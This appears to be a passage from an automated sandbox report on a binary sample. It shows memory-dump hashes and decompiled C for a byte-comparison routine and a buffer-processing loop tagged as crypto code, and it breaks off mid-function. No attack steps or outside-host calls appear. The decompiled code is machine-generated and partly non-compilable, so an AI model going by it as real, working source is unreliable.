                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a006c0
                            0x00a00695
                            0x00a0069e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0069e
                            0x00a005f3
                            0x00a005f5
                            0x00a0060d
                            0x00a00615
                            0x00a00617
                            0x00a0062f
                            0x00a00637
                            0x00a00639
                            0x00a00651
                            0x00a00659
                            0x00a0065b
                            0x00a00664
                            0x00a00664
                            0x00000000
                            0x00a0065b
                            0x00a00642
                            0x00a0064b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0064b
                            0x00a00620
                            0x00a00629
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00629
                            0x00a005fe
                            0x00a00607
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00554
                            0x00a00558
                            0x00a0055c
                            0x00a0055e
                            0x00a00576
                            0x00a00576
                            0x00a0057e
                            0x00a00580
                            0x00a00598
                            0x00a00598
                            0x00a005a0
                            0x00a005a2
                            0x00a005ba
                            0x00a005ba
                            0x00a005c2
                            0x00a005c4
                            0x00a005cd
                            0x00a005cd
                            0x00000000
                            0x00a005c4
                            0x00a005a8
                            0x00a005ab
                            0x00a005b4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a005b4
                            0x00a00586
                            0x00a00589
                            0x00a00592
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00592
                            0x00a00564
                            0x00a00567
                            0x00a00570
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00570
                            0x009ffcd6
                            0x009ffcd6
                            0x00a00ac7

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                            • Instruction ID: 58a953e99136d970f178b627b4663d6232b8f056e2427c037a477574e026d32a
                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                            • Instruction Fuzzy Hash: 3CC1C5722051AB0ADF2D4739D53463EFBA16EA27B171A076DD8F2CB4C5FE20D528D620
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FFCDE, Relevance: .3, Instructions: 331COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009FFCDE(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}






























                            0x009ffcde
                            0x009ffcde
                            0x009ffce4
                            0x009ffd5b
                            0x009ffd5d
                            0x009ffd5f
                            0x00000000
                            0x00000000
                            0x009ffd65
                            0x009ffd6b
                            0x009ffdf2
                            0x009ffdf4
                            0x009ffdf6
                            0x00000000
                            0x00000000
                            0x009ffdfc
                            0x009ffe02
                            0x009ffe89
                            0x009ffe8b
                            0x009ffe8d
                            0x00000000
                            0x00000000
                            0x009ffe93
                            0x009ffe99
                            0x009fff20
                            0x009fff22
                            0x009fff24
                            0x00000000
                            0x00000000
                            0x009fff2a
                            0x009fff30
                            0x009fffb7
                            0x009fffb9
                            0x009fffbb
                            0x00000000
                            0x00000000
                            0x009fffc7
                            0x00a0004f
                            0x00a00051
                            0x00a00053
                            0x00000000
                            0x00000000
                            0x00a00059
                            0x00a0005f
                            0x00a000e6
                            0x00a000e8
                            0x00a000ea
                            0x00a000f8
                            0x00a000fa
                            0x00a00107
                            0x00a00107
                            0x00a000fa
                            0x00000000
                            0x00a000ea
                            0x00a0006c
                            0x00a0006e
                            0x00a00086
                            0x00a0008e
                            0x00a00090
                            0x00a000a8
                            0x00a000b0
                            0x00a000b2
                            0x00a000ca
                            0x00a000d2
                            0x00a000d4
                            0x00a000dd
                            0x00a000dd
                            0x00000000
                            0x00a000d4
                            0x00a000bb
                            0x00a000c4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a000c4
                            0x00a00099
                            0x00a000a2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a000a2
                            0x00a00077
                            0x00a00080
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00080
                            0x009fffd5
                            0x009fffd7
                            0x009fffef
                            0x009ffff7
                            0x009ffff9
                            0x00a00011
                            0x00a00019
                            0x00a0001b
                            0x00a00033
                            0x00a0003b
                            0x00a0003d
                            0x00a00046
                            0x00a00046
                            0x00000000
                            0x00a0003d
                            0x00a00024
                            0x00a0002d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0002d
                            0x00a00002
                            0x00a0000b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0000b
                            0x009fffe0
                            0x009fffe9
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009fffe9
                            0x009fff3d
                            0x009fff3f
                            0x009fff57
                            0x009fff5f
                            0x009fff61
                            0x009fff79
                            0x009fff81
                            0x009fff83
                            0x009fff9b
                            0x009fffa3
                            0x009fffa5
                            0x009fffae
                            0x009fffae
                            0x00000000
                            0x009fffa5
                            0x009fff8c
                            0x009fff95
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009fff95
                            0x009fff6a
                            0x009fff73
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009fff73
                            0x009fff48
                            0x009fff51
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009fff51
                            0x009ffea6
                            0x009ffea8
                            0x009ffec0
                            0x009ffec8
                            0x009ffeca
                            0x009ffee2
                            0x009ffeea
                            0x009ffeec
                            0x009fff04
                            0x009fff0c
                            0x009fff0e
                            0x009fff17
                            0x009fff17
                            0x00000000
                            0x009fff0e
                            0x009ffef5
                            0x009ffefe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffefe
                            0x009ffed3
                            0x009ffedc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffedc
                            0x009ffeb1
                            0x009ffeba
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffeba
                            0x009ffe0f
                            0x009ffe11
                            0x009ffe29
                            0x009ffe31
                            0x009ffe33
                            0x009ffe4b
                            0x009ffe53
                            0x009ffe55
                            0x009ffe6d
                            0x009ffe75
                            0x009ffe77
                            0x009ffe80
                            0x009ffe80
                            0x00000000
                            0x009ffe77
                            0x009ffe5e
                            0x009ffe67
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffe67
                            0x009ffe3c
                            0x009ffe45
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffe45
                            0x009ffe1a
                            0x009ffe23
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffe23
                            0x009ffd78
                            0x009ffd7a
                            0x009ffd92
                            0x009ffd9a
                            0x009ffd9c
                            0x009ffdb4
                            0x009ffdbc
                            0x009ffdbe
                            0x009ffdd6
                            0x009ffdde
                            0x009ffde0
                            0x009ffde9
                            0x009ffde9
                            0x00000000
                            0x009ffde0
                            0x009ffdc7
                            0x009ffdd0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffdd0
                            0x009ffda5
                            0x009ffdae
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffdae
                            0x009ffd83
                            0x009ffd8c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffce6
                            0x009ffce6
                            0x009ffced
                            0x009ffcef
                            0x009ffd03
                            0x009ffd03
                            0x009ffd0b
                            0x009ffd0d
                            0x009ffd21
                            0x009ffd21
                            0x009ffd29
                            0x009ffd2b
                            0x009ffd3f
                            0x009ffd3f
                            0x009ffd47
                            0x009ffd49
                            0x009ffd52
                            0x009ffd52
                            0x00000000
                            0x009ffd49
                            0x009ffd31
                            0x009ffd34
                            0x009ffd3d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffd3d
                            0x009ffd13
                            0x009ffd16
                            0x009ffd1f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffd1f
                            0x009ffcf5
                            0x009ffcf8
                            0x009ffd01
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffd01
                            0x009ffcd6
                            0x009ffcd6
                            0x00a00ac7

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                            • Instruction ID: aea9bb002b5c0445a490942da0cc5a41af868f5a5ef86edcc62510ffd2cd9b6a
                            • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                            • Instruction Fuzzy Hash: 14C1BF722050AB0ADF2D8639C53453EBAA56EA27B131A077DD9F2CB4D5FE20C524E720
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F626D, Relevance: .3, Instructions: 325COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 98%
                            			E009F626D(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebp;
				signed int _t161;
				intOrPtr _t164;
				signed int _t170;
				signed int _t171;
				signed int _t175;
				signed int _t178;
				void* _t181;
				void* _t188;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int _t208;
				signed int _t212;
				intOrPtr _t213;
				signed int _t216;
				signed int _t219;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t232;
				void* _t238;
				signed int _t240;
				signed int _t241;
				intOrPtr _t245;
				intOrPtr _t247;
				signed int _t257;
				intOrPtr* _t259;
				signed int _t260;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr _t268;
				void* _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t276;

				_t216 = __ecx;
				E009F2A7F(__ecx, __edx);
				E009F42D8(__ecx,  *((intOrPtr*)(_t274 + 0x238)));
				_t240 = 0;
				if( *(_t216 + 0x1c) +  *(_t216 + 0x1c) != 0) {
					_t238 = 0;
					do {
						_t213 =  *((intOrPtr*)(_t216 + 0x18));
						_t238 = _t238 + 0x4ae4;
						_t240 = _t240 + 1;
						 *((char*)(_t213 + _t238 - 0x13)) = 0;
						 *((char*)(_t213 + _t238 - 0x11)) = 0;
					} while (_t240 <  *(_t216 + 0x1c) +  *(_t216 + 0x1c));
				}
				_t219 = 5;
				memcpy( *((intOrPtr*)(_t216 + 0x18)) + 0x18, _t216 + 0x8c, _t219 << 2);
				E009FEA80( *((intOrPtr*)(_t216 + 0x18)) + 0x30, _t216 + 0xa0, 0x4a9c);
				_t276 = _t274 + 0x18;
				_t263 = 0;
				 *(_t276 + 0x28) = 0;
				_t268 = 0;
				 *((char*)(_t276 + 0x13)) = 0;
				 *((intOrPtr*)(_t276 + 0x18)) = 0;
				 *((char*)(_t276 + 0x12)) = 0;
				while(1) {
					L4:
					_push(0x00400000 - _t263 & 0xfffffff0);
					_push( *((intOrPtr*)(_t216 + 0x20)) + _t263);
					_t161 = E009EC70F();
					 *(_t276 + 0x2c) = _t161;
					if(_t161 < 0) {
						break;
					}
					_t263 = _t263 + _t161;
					 *(_t276 + 0x20) = _t263;
					if(_t263 != 0) {
						if(_t161 <= 0) {
							goto L56;
						} else {
							if(_t263 >= 0x400) {
								L56:
								while(_t268 < _t263) {
									_t225 = 0;
									 *(_t276 + 0x14) =  *(_t276 + 0x14) & 0;
									 *(_t276 + 0x1c) = 0;
									_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
									__eflags = _t170;
									if(_t170 != 0) {
										_t245 =  *((intOrPtr*)(_t276 + 0x18));
										_t273 = 0;
										__eflags = 0;
										do {
											_t259 =  *((intOrPtr*)(_t216 + 0x18)) + _t273;
											 *(_t276 + 0x28) = _t225;
											__eflags =  *((char*)(_t259 + 0x4ad3));
											 *_t259 = _t216;
											if( *((char*)(_t259 + 0x4ad3)) == 0) {
												E009EA4AA(_t259 + 4,  *((intOrPtr*)(_t216 + 0x20)) + _t245);
												_t263 =  *(_t276 + 0x20);
												 *((intOrPtr*)(_t259 + 8)) = 0;
												_t170 = _t263 -  *((intOrPtr*)(_t276 + 0x18));
												__eflags = _t170;
												 *((intOrPtr*)(_t259 + 4)) = 0;
												 *(_t259 + 0x4acc) = _t170;
												if(_t170 != 0) {
													 *((char*)(_t259 + 0x4ad0)) = 0;
													 *((char*)(_t259 + 0x14)) = 0;
													 *((char*)(_t259 + 0x2c)) = 0;
													_t225 =  *(_t276 + 0x1c);
													goto L15;
												}
											} else {
												 *(_t259 + 0x4acc) = _t263;
												L15:
												__eflags =  *(_t276 + 0x2c);
												 *((char*)(_t259 + 0x4ad3)) = 0;
												 *(_t259 + 0x4ae0) = _t225;
												__eflags =  *((char*)(_t259 + 0x14));
												 *((char*)(_t259 + 0x4ad2)) = _t170 & 0xffffff00 |  *(_t276 + 0x2c) == 0x00000000;
												if( *((char*)(_t259 + 0x14)) != 0) {
													L20:
													__eflags =  *((char*)(_t276 + 0x13));
													if( *((char*)(_t276 + 0x13)) != 0) {
														L23:
														 *((char*)(_t259 + 0x4ad1)) = 1;
														 *((char*)(_t276 + 0x13)) = 1;
													} else {
														__eflags =  *((intOrPtr*)(_t259 + 0x18)) - 0x20000;
														if( *((intOrPtr*)(_t259 + 0x18)) > 0x20000) {
															goto L23;
														} else {
															 *(_t276 + 0x14) =  *(_t276 + 0x14) + 1;
														}
													}
													_t273 = _t273 + 0x4ae4;
													_t245 =  *((intOrPtr*)(_t276 + 0x18)) +  *((intOrPtr*)(_t259 + 0x24)) +  *((intOrPtr*)(_t259 + 0x18));
													_t225 = _t225 + 1;
													 *((intOrPtr*)(_t276 + 0x18)) = _t245;
													_t208 = _t263 - _t245;
													__eflags = _t208;
													 *(_t276 + 0x1c) = _t225;
													if(_t208 < 0) {
														L26:
														__eflags = _t208 - 0x400;
														if(_t208 >= 0x400) {
															goto L27;
														}
													} else {
														__eflags =  *((char*)(_t259 + 0x28));
														if( *((char*)(_t259 + 0x28)) == 0) {
															goto L26;
														}
													}
												} else {
													 *((char*)(_t259 + 0x14)) = 1;
													_push(_t259 + 0x18);
													_push(_t259 + 4);
													_t212 = E009F33D3(_t216);
													__eflags = _t212;
													if(_t212 == 0) {
														L29:
														 *((char*)(_t276 + 0x12)) = 1;
													} else {
														__eflags =  *((char*)(_t259 + 0x29));
														if( *((char*)(_t259 + 0x29)) != 0) {
															L19:
															_t225 =  *(_t276 + 0x1c);
															 *((char*)(_t216 + 0xe662)) = 1;
															goto L20;
														} else {
															__eflags =  *((char*)(_t216 + 0xe662));
															if( *((char*)(_t216 + 0xe662)) == 0) {
																goto L29;
															} else {
																goto L19;
															}
														}
													}
												}
											}
											goto L30;
											L27:
											_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
											__eflags = _t225 - _t170;
										} while (_t225 < _t170);
									}
									L30:
									_t226 =  *(_t276 + 0x14);
									_t171 = _t226;
									_t257 = _t171 /  *(_t216 + 0x1c);
									__eflags = _t171 %  *(_t216 + 0x1c);
									if(_t171 %  *(_t216 + 0x1c) != 0) {
										_t257 = _t257 + 1;
										__eflags = _t257;
									}
									_t269 = 0;
									__eflags = _t226;
									if(_t226 != 0) {
										_t247 = 0;
										_t267 = _t276 + 0x34;
										_t195 = _t257 * 0x4ae4;
										__eflags = _t195;
										 *((intOrPtr*)(_t276 + 0x24)) = 0;
										 *(_t276 + 0x30) = _t195;
										do {
											_t232 = _t267;
											_t248 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											_t197 =  *(_t276 + 0x14) - _t269;
											_t267 = _t267 + 8;
											 *_t232 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											__eflags = _t257 - _t197;
											if(_t257 < _t197) {
												_t197 = _t257;
											}
											__eflags =  *(_t276 + 0x1c) - 1;
											 *(_t232 + 4) = _t197;
											if( *(_t276 + 0x1c) != 1) {
												E009F045D( *((intOrPtr*)(_t216 + 0x14)), E009F6CAC, _t232);
											} else {
												E009F66A2(_t216, _t248);
											}
											_t269 = _t269 + _t257;
											_t247 =  *((intOrPtr*)(_t276 + 0x24)) +  *(_t276 + 0x30);
											 *((intOrPtr*)(_t276 + 0x24)) = _t247;
											__eflags = _t269 -  *(_t276 + 0x14);
										} while (_t269 <  *(_t276 + 0x14));
										_t263 =  *(_t276 + 0x20);
									}
									_t270 =  *(_t276 + 0x1c);
									__eflags = _t270;
									if(_t270 == 0) {
										_t268 =  *((intOrPtr*)(_t276 + 0x18));
										goto L68;
									} else {
										E009F0697( *((intOrPtr*)(_t216 + 0x14)));
										 *(_t276 + 0x14) = 0;
										__eflags = _t270;
										if(_t270 == 0) {
											L52:
											_t175 =  *((intOrPtr*)(_t276 + 0x12));
											goto L53;
										} else {
											_t260 = 0;
											__eflags = 0;
											do {
												_t272 =  *((intOrPtr*)(_t216 + 0x18)) + _t260;
												__eflags =  *((char*)(_t272 + 0x4ad1));
												if( *((char*)(_t272 + 0x4ad1)) != 0) {
													L47:
													_t178 = E009F6CDB(_t216, _t272);
													__eflags = _t178;
													if(_t178 != 0) {
														goto L48;
													}
												} else {
													_t194 = E009F2E2C(_t216, _t272);
													__eflags = _t194;
													if(_t194 != 0) {
														__eflags =  *((char*)(_t272 + 0x4ad1));
														if( *((char*)(_t272 + 0x4ad1)) == 0) {
															L48:
															__eflags =  *((char*)(_t272 + 0x4ad0));
															if( *((char*)(_t272 + 0x4ad0)) == 0) {
																__eflags =  *((char*)(_t272 + 0x4ad3));
																if( *((char*)(_t272 + 0x4ad3)) != 0) {
																	_t230 =  *((intOrPtr*)(_t216 + 0x20));
																	_t181 =  *((intOrPtr*)(_t272 + 0x10)) -  *((intOrPtr*)(_t216 + 0x20)) +  *(_t272 + 4);
																	__eflags = _t263 - _t181;
																	if(_t263 > _t181) {
																		_t263 = _t263 - _t181;
																		 *(_t276 + 0x2c) = _t263;
																		E00A00E40(_t230, _t181 + _t230, _t263);
																		_t276 = _t276 + 0xc;
																		 *((intOrPtr*)(_t272 + 0x18)) =  *((intOrPtr*)(_t272 + 0x18)) +  *(_t272 + 0x20) -  *(_t272 + 4);
																		 *(_t272 + 0x24) =  *(_t272 + 0x24) & 0x00000000;
																		 *(_t272 + 0x20) =  *(_t272 + 0x20) & 0x00000000;
																		 *(_t272 + 4) =  *(_t272 + 4) & 0x00000000;
																		 *((intOrPtr*)(_t272 + 0x10)) =  *((intOrPtr*)(_t216 + 0x20));
																		__eflags =  *(_t276 + 0x14);
																		if( *(_t276 + 0x14) != 0) {
																			_t188 =  *((intOrPtr*)(_t216 + 0x18));
																			E009FEA80(_t188, _t272, 0x4ae4);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4ad4)) =  *((intOrPtr*)(_t188 + 0x4ad4));
																			_t263 =  *(_t276 + 0x2c);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4adc)) =  *((intOrPtr*)(_t188 + 0x4adc));
																			 *((char*)(_t272 + 0x4ad3)) = 0;
																			goto L62;
																		}
																		goto L63;
																	}
																} else {
																	__eflags =  *((char*)(_t272 + 0x28));
																	if( *((char*)(_t272 + 0x28)) != 0) {
																		_t175 = 1;
																		 *((char*)(_t276 + 0x12)) = 1;
																		L53:
																		__eflags = _t175;
																		if(_t175 == 0) {
																			_t268 =  *((intOrPtr*)(_t276 + 0x18));
																			_t263 = _t263 - _t268;
																			__eflags = _t263 - 0x400;
																			if(_t263 < 0x400) {
																				__eflags = _t263;
																				if(__eflags >= 0) {
																					if(__eflags <= 0) {
																						L63:
																						_t268 = 0;
